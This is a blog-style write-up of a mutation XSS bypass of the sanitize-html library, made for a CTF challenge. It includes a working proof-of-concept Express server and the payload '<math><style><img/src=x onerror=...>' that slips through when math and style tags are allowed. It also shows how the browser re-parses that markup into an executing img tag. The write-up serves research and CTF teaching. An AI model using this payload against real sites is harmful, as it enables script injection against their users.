0xhexr4 :)

HTML Sanitize Bypass Using MXSS

A couple of months ago, I was creating a CTF challenge but was missing a bug. To increase the difficulty of my challenge, I started looking for HTML sanitizer bypasses. During my research, I learned about Mutation XSS (MXSS), which can be used to bypass HTML sanitizers.

Quick Introduction to Mutation XSS

When broken markup is rendered, instead of crashing or displaying an error message, browsers attempt to interpret and fix the HTML as best as they can, even if it contains minor syntax errors or missing elements. For instance, opening the following markup in the browser

<p>test

will execute as expected despite missing a closing `</p>` tag. When looking at the final page’s HTML code, we can see that the parser fixed our broken markup and closed the `<p>` element by itself:

<p>test</p>

sanitize-html Bypass

While reading the documentation of the "sanitize-html" library, I noticed that it's built on "htmlparser2," which does not strictly comply with HTML specifications.

Continuing with the testing after trying a bunch of payloads, I managed to create the following Proof of Concept (POC):

                    
const express = require("express");
const bodyParser = require("body-parser");
const sanitizeHtml = require("sanitize-html");

const app = express();

app.use(bodyParser.urlencoded({ extended: true }));

app.get("/", (req, res) => {
    const userInput = `<math><style><img/src=x onerror="alert(1)"`;
    const sanitizedInput = sanitizeHtml(userInput, {
        allowedTags: sanitizeHtml.defaults.allowedTags.concat(["math", "style"]),
    });

    res.send(`
    <!DOCTYPE html>
    <html lang="en">
        <head>
            <meta charset="UTF-8">
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <title>Sanitized Output</title>
        </head>
        <body>
            <h1>Sanitized Output</h1>
            <p>${sanitizedInput}</p>
            <a href="/">Back to form</a>
        </body>
    </html>
    `);
});

const PORT = process.env.PORT || 1337;
app.listen(PORT, () => {
    console.log(`Server is running on http://localhost:${PORT}`);
});

Technically, I think the maintainers of the library are aware of this issue because if you allow the style element in the allowed elements, you receive the following warning:

                    
Server is running on http://localhost:1337

⚠️ Your `allowedTags` option includes `style`,
which is inherently vulnerable to XSS attacks.
Please remove it from `allowedTags`. Or, to
disable this warning, add the `allowVulnerableTags`
option and ensure you are accounting for this risk.

<math><style><img/src=x onerror="alert(1)"

This payload is not sanitized because htmlparser2 parses everything inside the style element as raw text. However, when the browser tries to fix the broken HTML, it does so according to HTML5 standards, resulting in the following rendering:

    <math></math>
    <style></style>
    <img src="x" onerror="alert(1)">

According to HTML standards, the <style> element cannot be inside the <math> element, so the <math> element is closed before encountering the <style> element.

The <style> tag should only contain CSS, and the <math> tag should contain MathML elements. Placing an <img> tag inside a <style> tag violates these rules, so browsers automatically close the <style> tag before processing the <img> tag.

That's how this bypass works. In htmlparser2, it does not validate the content of the <style> element since it is treated as raw text.

The latest version as for now v2.13.1 is still has this issue and I dont think it will be patched unless the library replaces htmlparser2. This issue is showcased in the University CTF 2024 Intergalactic Bounty web challenge. Thanks a lot for reading! :)